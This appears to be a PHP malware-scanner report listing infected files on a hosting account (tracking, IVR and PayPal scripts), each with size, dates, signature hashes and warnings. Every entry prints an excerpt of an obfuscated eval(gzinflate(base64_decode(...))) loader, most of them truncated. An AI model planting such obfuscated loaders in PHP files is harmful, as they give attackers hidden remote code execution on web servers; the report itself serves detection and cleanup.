RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19/XfbRq7oz8o5+R8mTG4p1/qwnbbbyh85aZxu/V6d5MbO9uzJ7dPSEm0zkUiWpOL4Zv2/PwDzTQ4pynaatBvt1pFIDAaDwWAwGAzm7p27d4bDJ+fh5C07TTI2SeLT6GwwuHsnOmXde6fRLByH76O8yLveYDCM4slsMQ2HAiw9T721Nfbh7p3ONAq73s7J3vF5mIUsylkQszDLkmzAnhAwQ1wsTgqoZxFPB+zFLAzykGVhP4rzIpjNGK+/CCYFyxdpmmTFYGd4suetbd+9c3X3Th7meZTEYwDOii4+zMLfF1EWjpN4EnZ9g75FEc2QOh+h8H8P0uAsZLvMC6bzKMYfHrx5MD2BZ3F4wfZ/JITD4X5QBCdIVx4WRRSf5QAFRAHY/DL/fTaG73E4KboP9n8c//z86LiHX14dPX1JX148PjpCPBw2D2cAOp6eEPSzx4d...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19/XfbRq7oz8o5+R8mTG4p1/qwnbbbyh85aZxu/V6d5MbO9uzJ7dPSEm0zkUiWpOL4Zv2/PwDzTQ4pynaatBvt1pFIDAaDwWAwGAzm7p27d4bDJ+fh5C07TTI2SeLT6GwwuHsnOmXde6fRLByH76O8yLveYDCM4slsMQ2HAiw9T721Nfbh7p3ONAq73s7J3vF5mIUsylkQszDLkmzAnhAwQ1wsTgqoZxFPB+zFLAzykGVhP4rzIpjNGK+/CCYFyxdpmmTFYGd4suetbd+9c3X3Th7meZTEYwDOii4+zMLfF1EWjpN4EnZ9g75FEc2QOh+h8H8P0uAsZLvMC6bzKMYfHrx5MD2BZ3F4wfZ/JITD4X5QBCdIVx4WRRSf5QAFRAHY/DL/fTaG73E4KboP9n8c//z86LiHX14dPX1JX148PjpCPBw2D2cAOp6eEPSzx4d...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivr/ivrblock.php

Size: 17.82 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19a3fbNtLwZ/ec/geU6z6StpYtJXHa+qJsmjibnKdO+trO5uz65OihRdriRiJVkorj7ea/vzMDgARAkKJ8i93QZ7cRQVxnBnPDDMi+/ebbb1ZPJtHow1GQTny2y9w4di/arb/Hvp8G4VnS2h0oD2vfftPa98M5ltK/WPA8cCdYQP9iwUE0D72D6CQIsZieGH+k9vNJGswm/uv59MSPaQBZxGQZ1jvcP8R3+A8+/iMKRv7UDWio/EF79S5Ix9E8PYC5Fmu9dMOz+QzLxS+aexzN2NiPfVpA9oCv3szSV7QA+NF9xed+CD1P/KdnfpjiG/4DX9CvV/84yEoZPuCbX+ZJEPpJ8jKa88XKAsZLvv2ms41oOJ2HozSIQgatcwD+grhpr56/8nZbrTW2OpM/QvrB4NfpJDpPL2Y+Pa6OojCF4YdYwrCqLKHfnpu6or3/Kc1b5ivv/PHtNytnk+jEnTCFMrZXvv2GMVkOXdK...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3fbNtLwZ/ec/geU6z6StpYtJXHa+qJsmjibnKdO+trO5uz65OihRdriRiJVkorj7ea/vzMDgARAkKJ8i93QZ7cRQVxnBnPDDMi+/ebbb1ZPJtHow1GQTny2y9w4di/arb/Hvp8G4VnS2h0oD2vfftPa98M5ltK/WPA8cCdYQP9iwUE0D72D6CQIsZieGH+k9vNJGswm/uv59MSPaQBZxGQZ1jvcP8R3+A8+/iMKRv7UDWio/EF79S5Ix9E8PYC5Fmu9dMOz+QzLxS+aexzN2NiPfVpA9oCv3szSV7QA+NF9xed+CD1P/KdnfpjiG/4DX9CvV/84yEoZPuCbX+ZJEPpJ8jKa88XKAsZLvv2ms41oOJ2HozSIQgatcwD+grhpr56/8nZbrTW2OpM/QvrB4NfpJDpPL2Y+Pa6OojCF4YdYwrCqLKHfnpu6or3/Kc1...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3fbNtLwZ/ec/geU6z6StpYtJXHa+qJsmjibnKdO+trO5uz65OihRdriRiJVkorj7ea/vzMDgARAkKJ8i93QZ7cRQVxnBnPDDMi+/ebbb1ZPJtHow1GQTny2y9w4di/arb/Hvp8G4VnS2h0oD2vfftPa98M5ltK/WPA8cCdYQP9iwUE0D72D6CQIsZieGH+k9vNJGswm/uv59MSPaQBZxGQZ1jvcP8R3+A8+/iMKRv7UDWio/EF79S5Ix9E8PYC5Fmu9dMOz+QzLxS+aexzN2NiPfVpA9oCv3szSV7QA+NF9xed+CD1P/KdnfpjiG/4DX9CvV/84yEoZPuCbX+ZJEPpJ8jKa88XKAsZLvv2ms41oOJ2HozSIQgatcwD+grhpr56/8nZbrTW2OpM/QvrB4NfpJDpPL2Y+Pa6OojCF4YdYwrCqLKHfnpu6or3/Kc1...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivr/opt_hours.php

Size: 11.33 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09a3PbtrKf05n+B4TxCaVWDyuOk1a2lKSO22amaXJj53R6MrkaSoQsxhSpkpQdN8f//e7iQQIgSEl+tOlt1YclAlgsdhe7iwWw/PKLO19+cafbPZjRySmZxgmZxNE0OOl04HEwJY270yCkI/oxSLO04XQ63SCahEufdkW9xWzhNJvkE1S/4we04eyPh8czmlASpMSLCE2SOOmQA1abIDASxRn0tIz8DnkdUi+lJKHtIEozLwwJxyDzJhlJl4tFnGSd/e546DT3oIdL+C+laRrE0QiqJ1mDPU7ob8sgoaM4mtCGq+C4zIIQMXRZNf7v1sI7oWRAHM+fBxH+cLBwyx/Dw4iek+ffAVROlede5o0RwZRmWRCdpFgR0IOa84v0t3AE3yM6yRpbz78b/fjq6LiFX94eHb5hX14/OzrCngl8eP2UhlB95I9Zi5+fvTxsITyshP9Al6+BFmHs+YRxJJVcCFJAobE1Ojo8Onr...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3PbtrKf05n+B4TxCaVWDyuOk1a2lKSO22amaXJj53R6MrkaSoQsxhSpkpQdN8f//e7iQQIgSEl+tOlt1YclAlgsdhe7iwWw/PKLO19+cafbPZjRySmZxgmZxNE0OOl04HEwJY270yCkI/oxSLO04XQ63SCahEufdkW9xWzhNJvkE1S/4we04eyPh8czmlASpMSLCE2SOOmQA1abIDASxRn0tIz8DnkdUi+lJKHtIEozLwwJxyDzJhlJl4tFnGSd/e546DT3oIdL+C+laRrE0QiqJ1mDPU7ob8sgoaM4mtCGq+C4zIIQMXRZNf7v1sI7oWRAHM+fBxH+cLBwyx/Dw4iek+ffAVROlede5o0RwZRmWRCdpFgR0IOa84v0t3AE3yM6yRpbz78b/fjq6LiFX94eHb5hX14/OzrCngl8eP2UhlB95I9Zi5+fvTxsITy...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3PbtrKf05n+B4TxCaVWDyuOk1a2lKSO22amaXJj53R6MrkaSoQsxhSpkpQdN8f//e7iQQIgSEl+tOlt1YclAlgsdhe7iwWw/PKLO19+cafbPZjRySmZxgmZxNE0OOl04HEwJY270yCkI/oxSLO04XQ63SCahEufdkW9xWzhNJvkE1S/4we04eyPh8czmlASpMSLCE2SOOmQA1abIDASxRn0tIz8DnkdUi+lJKHtIEozLwwJxyDzJhlJl4tFnGSd/e546DT3oIdL+C+laRrE0QiqJ1mDPU7ob8sgoaM4mtCGq+C4zIIQMXRZNf7v1sI7oWRAHM+fBxH+cLBwyx/Dw4iek+ffAVROlede5o0RwZRmWRCdpFgR0IOa84v0t3AE3yM6yRpbz78b/fjq6LiFX94eHb5hX14/OzrCngl8eP2UhlB95I9Zi5+fvTxsITy...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivr/process_edit.php

Size: 835.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1UbWvbMBD+7MH+wy0YbI+N5HuWwlhTFlg76Ab7EILwbKURcyRXVuaZ4v8+nU52naTpwjYSx9Hpee7lOeng5YsgsI/9rncyM0JJuOOG5alJWSW2ZcHjMFvkiQU8IPauUN/TAsJMySmuw+q+YLmBGYy+zD/NP3yF13B1+/kasrQomPipWS1y6xG+fZzfziFT2zKVzSK3BPQL728uoXTLaBKNyKXmlV1vG+tasPsd102M8d6AD5YoDbngsUMwrrXScZI4rlhD7Ilyt2Va1VWM/hK4mEACoR54XnOTbViqddoQhqLXlJyulpH9G63IKh+tsrd2D0ZFHqoU5AqcUiSN5L/OFsdHti8SwinBpHNwSg30T4lTKpTqbOJNp/RAr14TAlLKGPIg4qFKjjnt0L0saB5K02UThFjrZWqWWNfKazrk1APOEbo8RJfPodeFqk1T8n3Ko/UUz8ppuDTsmLu/8wf+k9TTLHlYm3yuNry...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1UbWvbMBD+7MH+wy0YbI+N5HuWwlhTFlg76Ab7EILwbKURcyRXVuaZ4v8+nU52naTpwjYSx9Hpee7lOeng5YsgsI/9rncyM0JJuOOG5alJWSW2ZcHjMFvkiQU8IPauUN/TAsJMySmuw+q+YLmBGYy+zD/NP3yF13B1+/kasrQomPipWS1y6xG+fZzfziFT2zKVzSK3BPQL728uoXTLaBKNyKXmlV1vG+tasPsd102M8d6AD5YoDbngsUMwrrXScZI4rlhD7Ilyt2Va1VWM/hK4mEACoR54XnOTbViqddoQhqLXlJyulpH9G63IKh+tsrd2D0ZFHqoU5AqcUiSN5L/OFsdHti8SwinBpHNwSg30T4lTKpTqbOJNp/RAr14TAlLKGPIg4qFKjjnt0L0saB5K02UThFjrZWqWWNfKazrk1APOEbo8RJfPodeFqk1T8n3...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1UbWvbMBD+7MH+wy0YbI+N5HuWwlhTFlg76Ab7EILwbKURcyRXVuaZ4v8+nU52naTpwjYSx9Hpee7lOeng5YsgsI/9rncyM0JJuOOG5alJWSW2ZcHjMFvkiQU8IPauUN/TAsJMySmuw+q+YLmBGYy+zD/NP3yF13B1+/kasrQomPipWS1y6xG+fZzfziFT2zKVzSK3BPQL728uoXTLaBKNyKXmlV1vG+tasPsd102M8d6AD5YoDbngsUMwrrXScZI4rlhD7Ilyt2Va1VWM/hK4mEACoR54XnOTbViqddoQhqLXlJyulpH9G63IKh+tsrd2D0ZFHqoU5AqcUiSN5L/OFsdHti8SwinBpHNwSg30T4lTKpTqbOJNp/RAr14TAlLKGPIg4qFKjjnt0L0saB5K02UThFjrZWqWWNfKazrk1APOEbo8RJfPodeFqk1T8n3...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/ivr/process_ivr.php

Size: 3.93 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1be2/bOBL/2wX6HbiCUdmAa6fYw/WQbHqbjd02QPM4x+miSAtBsRhbG72qR1Ljtt/9ZkiKD1ly7MTZA4rtI47JEefB3wyHQ+r5s+fwt+VH06DwaMfq9wfi98E0jq79WT+ZJ1Z3r4GmyP1AUjx/NqeuR9OOPfqW+CnNdondn4Wem9OOPewRjxyTT+T9rr+bkc/vPh9/ntg9kvsh7XTJS/Kvf/5jZ6fLx2kDb7JPwkX2NXDg94hO8057+Jvz/vR80sNfLs5HY/bL2cH5OT7EaTMaAKnjXTHqk4PjUY+NJYa9O/Jg2LYzHv3nYnQ+IZc2tNhfoLOdmF2XdlL2RNWeqOyZxmHiRotqv2zmVNdBfJcvEmoSla2cxp3mZjc0sB7861+TDiGcZp/YmXtLbdJ9/uy/MCntJKW3flxkTAhi22ym8AGm7E/7NiNtIS1r/8nPMgrG1FjNaJS/dJMkoMCzi9QtY1wY2OqRhP9m47g...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1be2/bOBL/2wX6HbiCUdmAa6fYw/WQbHqbjd02QPM4x+miSAtBsRhbG72qR1Ljtt/9ZkiKD1ly7MTZA4rtI47JEefB3wyHQ+r5s+fwt+VH06DwaMfq9wfi98E0jq79WT+ZJ1Z3r4GmyP1AUjx/NqeuR9OOPfqW+CnNdondn4Wem9OOPewRjxyTT+T9rr+bkc/vPh9/ntg9kvsh7XTJS/Kvf/5jZ6fLx2kDb7JPwkX2NXDg94hO8057+Jvz/vR80sNfLs5HY/bL2cH5OT7EaTMaAKnjXTHqk4PjUY+NJYa9O/Jg2LYzHv3nYnQ+IZc2tNhfoLOdmF2XdlL2RNWeqOyZxmHiRotqv2zmVNdBfJcvEmoSla2cxp3mZjc0sB7861+TDiGcZp/YmXtLbdJ9/uy/MCntJKW3flxkTAhi22ym8AGm7E/7NiNtIS1r/8nPMgr...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1be2/bOBL/2wX6HbiCUdmAa6fYw/WQbHqbjd02QPM4x+miSAtBsRhbG72qR1Ljtt/9ZkiKD1ly7MTZA4rtI47JEefB3wyHQ+r5s+fwt+VH06DwaMfq9wfi98E0jq79WT+ZJ1Z3r4GmyP1AUjx/NqeuR9OOPfqW+CnNdondn4Wem9OOPewRjxyTT+T9rr+bkc/vPh9/ntg9kvsh7XTJS/Kvf/5jZ6fLx2kDb7JPwkX2NXDg94hO8057+Jvz/vR80sNfLs5HY/bL2cH5OT7EaTMaAKnjXTHqk4PjUY+NJYa9O/Jg2LYzHv3nYnQ+IZc2tNhfoLOdmF2XdlL2RNWeqOyZxmHiRotqv2zmVNdBfJcvEmoSla2cxp3mZjc0sB7861+TDiGcZp/YmXtLbdJ9/uy/MCntJKW3flxkTAhi22ym8AGm7E/7NiNtIS1r/8nPMgr...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

Sign de12c454 Line: 3 Dangerous

Malware Signature (hash: de12c454)

<?php VjaG

/custdata01/kings/public_html/tracking/paypal/paypal_email_invoice_proxy.php

Size: 1.64 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:52 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJVWbU/jOBD+3Er9Dz4LqakOku63E7Sgu4VdWK0E15Y9nVAVubHbeEnsYDstXcR/v3GcpC8bll4Fij2eeeZ97E6701bsKeeKhVJEzMO+H3ARJTllQW544mdxhntnv+CiM5+LpeQRq3k77aOSdEPREB2Fn68mD7gkhZzi6Q4TsAi2Qjdu5zmEIFgwgyoOLubS30joP5UiawtdEk7OgbsE0B6xp16n3drWiYbnaGNWp93btXQf0al46DtT+dzbYXzoch1mhNPudDj80Ou0XzptBL+Lc/cd6EjxzCCzztgQG/Zsgu9kSRwVl0z2RxKmjNedxFzXzsZEA10xQtdoxphAVpHftfZWYisuqFz5iYyI4VKA3TYlM54kXCzCRC7CrZxcbKIwHFwAAbEolkgbFSqWJcQm9AQfIwz/u15iSgwL07V+SsK5VCkxeNpDPtqPBYQBXMelgYPA+VnFwqp0S8pdel93Ip/KXJiPuVJMRNs...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVWbU/jOBD+3Er9Dz4LqakOku63E7Sgu4VdWK0E15Y9nVAVubHbeEnsYDstXcR/v3GcpC8bll4Fij2eeeZ97E6701bsKeeKhVJEzMO+H3ARJTllQW544mdxhntnv+CiM5+LpeQRq3k77aOSdEPREB2Fn68mD7gkhZzi6Q4TsAi2Qjdu5zmEIFgwgyoOLubS30joP5UiawtdEk7OgbsE0B6xp16n3drWiYbnaGNWp93btXQf0al46DtT+dzbYXzoch1mhNPudDj80Ou0XzptBL+Lc/cd6EjxzCCzztgQG/Zsgu9kSRwVl0z2RxKmjNedxFzXzsZEA10xQtdoxphAVpHftfZWYisuqFz5iYyI4VKA3TYlM54kXCzCRC7CrZxcbKIwHFwAAbEolkgbFSqWJcQm9AQfIwz/u15iSgwL07V+SsK5VCkxeNpDPtqPBYQBXMe...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJVWbU/jOBD+3Er9Dz4LqakOku63E7Sgu4VdWK0E15Y9nVAVubHbeEnsYDstXcR/v3GcpC8bll4Fij2eeeZ97E6701bsKeeKhVJEzMO+H3ARJTllQW544mdxhntnv+CiM5+LpeQRq3k77aOSdEPREB2Fn68mD7gkhZzi6Q4TsAi2Qjdu5zmEIFgwgyoOLubS30joP5UiawtdEk7OgbsE0B6xp16n3drWiYbnaGNWp93btXQf0al46DtT+dzbYXzoch1mhNPudDj80Ou0XzptBL+Lc/cd6EjxzCCzztgQG/Zsgu9kSRwVl0z2RxKmjNedxFzXzsZEA10xQtdoxphAVpHftfZWYisuqFz5iYyI4VKA3TYlM54kXCzCRC7CrZxcbKIwHFwAAbEolkgbFSqWJcQm9AQfIwz/u15iSgwL07V+SsK5VCkxeNpDPtqPBYQBXMe...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/paypal/paypal_invoice_ipn_handler.php

Size: 2.62 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:52 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN1YXW8bNxZ9lgH/B3pgVKNUlpLuPiUrY43YRVSkjZo4WRSJIVAzlMRmhpySHNvawP99zyU50kiWnQ2Qp8qwpCF5L+89PPeDOjwYDo955qa2ript3DQXs3rBRsyZWrw4PDg8sMJNnSzFtJCldOnTHkblQmkjprUVZspnEEuf0bAwRpupEaRIqkV6MT17/dqvV3IKPSnr5tJWBV9N/VLb7XefdWnBcOiWguUzlhXc2sHhgRF/1RJbaJWJNBkMhlJlRZ2LYabVXC4G1bJKSPDBdfns/1oj1bWWmViv7TS2jCv1WlonlDBfNwrSJxVfVbw4kZUa4r+IsmvFpFcq67hykjvB9u5xeHDcCOIIlLhpL0kbNdmSqwU0aDbnhRVsrg2rjM7rzEmtBi0lJ6c4oqnlKp/pW2j0670WZ1bsC33pDIcl/yyYrQ0ZJS2zmZGVY/iW8aIQOastDpNN3ry77LOJ9xJDwvoR7NZpbRcRmmj...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YXW8bNxZ9lgH/B3pgVKNUlpLuPiUrY43YRVSkjZo4WRSJIVAzlMRmhpySHNvawP99zyU50kiWnQ2Qp8qwpCF5L+89PPeDOjwYDo955qa2ript3DQXs3rBRsyZWrw4PDg8sMJNnSzFtJCldOnTHkblQmkjprUVZspnEEuf0bAwRpupEaRIqkV6MT17/dqvV3IKPSnr5tJWBV9N/VLb7XefdWnBcOiWguUzlhXc2sHhgRF/1RJbaJWJNBkMhlJlRZ2LYabVXC4G1bJKSPDBdfns/1oj1bWWmViv7TS2jCv1WlonlDBfNwrSJxVfVbw4kZUa4r+IsmvFpFcq67hykjvB9u5xeHDcCOIIlLhpL0kbNdmSqwU0aDbnhRVsrg2rjM7rzEmtBi0lJ6c4oqnlKp/pW2j0670WZ1bsC33pDIcl/yyYrQ0ZJS2zmZGVY/iW8aI...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YXW8bNxZ9lgH/B3pgVKNUlpLuPiUrY43YRVSkjZo4WRSJIVAzlMRmhpySHNvawP99zyU50kiWnQ2Qp8qwpCF5L+89PPeDOjwYDo955qa2ript3DQXs3rBRsyZWrw4PDg8sMJNnSzFtJCldOnTHkblQmkjprUVZspnEEuf0bAwRpupEaRIqkV6MT17/dqvV3IKPSnr5tJWBV9N/VLb7XefdWnBcOiWguUzlhXc2sHhgRF/1RJbaJWJNBkMhlJlRZ2LYabVXC4G1bJKSPDBdfns/1oj1bWWmViv7TS2jCv1WlonlDBfNwrSJxVfVbw4kZUa4r+IsmvFpFcq67hykjvB9u5xeHDcCOIIlLhpL0kbNdmSqwU0aDbnhRVsrg2rjM7rzEmtBi0lJ6c4oqnlKp/pW2j0670WZ1bsC33pDIcl/yyYrQ0ZJS2zmZGVY/iW8aI...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/recording/index.php

Size: 103.00 B Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:52 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPlSslM1dC05uUCAJVJIsAKAAAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOPlSslM1dC05uUCAJVJIsAKAAAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/update/index.php

Size: 139.28 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:52 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOy9e3PkNpIv+v9EzHfgOiai27FtT/FN7lzfuKVHt9qWWlpJ7d45Mw41VAWpuGKRZT4kyyf2u18kWA8gmQBZLfvszL3rmbC7pR/ARGYikUgkEn/8w5//7BwdOD8eX169P//wxz/86ZFXdVYWzndO6P3lj3/44x8q/nObVfymLGb89VfffvvnrJjl7Zz/eVYWd9n9t6vF6quvBfI+L29Z7vzp6ODm5Pzq+o3808er48vuTxfTq6vuTx+mZ8ey5+zudd1Uq7J+vW301V+++vpfvvvO+cb9etuTIEXAbiq+yhmQ8Je2yH65qcvZA2++++rNV//21ZsN9GvZ75/yrHgQrZbP9c/5jSCz4LPmtY0waJfdOa/XLb9z7lhe86+d//3HPzjin3kmPvuWZTmfO03ptKs5a7hzxBp2y2r+rXORc/FfR3ypYbPGqdvVqqyab52/HVdVWTnuT5JB/9V9o6Oq5rkg6mZ++3rDEkENfP3...

Exploit execution Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOy9e3PkNpIv+v9EzHfgOiai27FtT/FN7lzfuKVHt9qWWlpJ7d45Mw41VAWpuGKRZT4kyyf2u18kWA8gmQBZLfvszL3rmbC7pR/ARGYikUgkEn/8w5//7BwdOD8eX169P//wxz/86ZFXdVYWzndO6P3lj3/44x8q/nObVfymLGb89VfffvvnrJjl7Zz/eVYWd9n9t6vF6quvBfI+L29Z7vzp6ODm5Pzq+o3808er48vuTxfTq6vuTx+mZ8ey5+zudd1Uq7J+vW301V+++vpfvvvO+cb9etuTIEXAbiq+yhmQ8Je2yH65qcvZA2++++rNV//21ZsN9GvZ75/yrHgQrZbP9c/5jSCz4LPmtY0waJfdOa/XLb9z7lhe86+d//3HPzjin3kmPvuWZTmfO03ptKs5a7hzxBp2y2r+rXORc/FfR3ypYbPGqdvVqqyab52/HVd...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOy9e3PkNpIv+v9EzHfgOiai27FtT/FN7lzfuKVHt9qWWlpJ7d45Mw41VAWpuGKRZT4kyyf2u18kWA8gmQBZLfvszL3rmbC7pR/ARGYikUgkEn/8w5//7BwdOD8eX169P//wxz/86ZFXdVYWzndO6P3lj3/44x8q/nObVfymLGb89VfffvvnrJjl7Zz/eVYWd9n9t6vF6quvBfI+L29Z7vzp6ODm5Pzq+o3808er48vuTxfTq6vuTx+mZ8ey5+zudd1Uq7J+vW301V+++vpfvvvO+cb9etuTIEXAbiq+yhmQ8Je2yH65qcvZA2++++rNV//21ZsN9GvZ75/yrHgQrZbP9c/5jSCz4LPmtY0waJfdOa/XLb9z7lhe86+d//3HPzjin3kmPvuWZTmfO03ptKs5a7hzxBp2y2r+rXORc/FfR3ypYbPGqdvVqqyab52/HVd...

Sign 7830f7a6 Line: 3 Dangerous

Malware Signature (hash: 7830f7a6)

<?php nvcH

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/record_audio.php

Size: 1.14 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1V32/aSBB+R+J/mFooGImE11PLD9Fg5ZDaJgek93CqrGU9jre1d+nuOg536v9+s7YBE0rbSPUD2J5vvplvPDPbbg0GcymsYOJfIR/AJggGjRFKtlv1TWgs09bvvWm32gSfYSzkDitZhqBi2LAHbLc67g9G4G2USkOZZ2vUXu02lzzNI+cnkRMx01uIRYqm3dL4NRcaQyU5QleUQBzkVqRXm2TTfXMOYQuRChUmyCLUO2h7ryg9SJq9BbX+jNxSjtGaMpRY0MtS00Oq1iyFziK4vl3M5h9uliWLiMF/hdnGbv1OuAj+ug+Wq3+6C+RKOxX3Ou1+6vXgv3YL6BKxL4xB28QW88hBaoS7OsZmlqJTDpdjnhursuAJeW7R9+7vZtNVAJylaSgedViI6AEtLIMVcCUtShva7cZVt1tlGk7vZ/Pbbn9nJssE/v4zWARAkd2T5+Qdxb4cYx2Pac1+oKx/qqPm+rYTDKeKuco...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1V32/aSBB+R+J/mFooGImE11PLD9Fg5ZDaJgek93CqrGU9jre1d+nuOg536v9+s7YBE0rbSPUD2J5vvplvPDPbbg0GcymsYOJfIR/AJggGjRFKtlv1TWgs09bvvWm32gSfYSzkDitZhqBi2LAHbLc67g9G4G2USkOZZ2vUXu02lzzNI+cnkRMx01uIRYqm3dL4NRcaQyU5QleUQBzkVqRXm2TTfXMOYQuRChUmyCLUO2h7ryg9SJq9BbX+jNxSjtGaMpRY0MtS00Oq1iyFziK4vl3M5h9uliWLiMF/hdnGbv1OuAj+ug+Wq3+6C+RKOxX3Ou1+6vXgv3YL6BKxL4xB28QW88hBaoS7OsZmlqJTDpdjnhursuAJeW7R9+7vZtNVAJylaSgedViI6AEtLIMVcCUtShva7cZVt1tlGk7vZ/Pbbn9nJssE/v4zWARAkd2...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

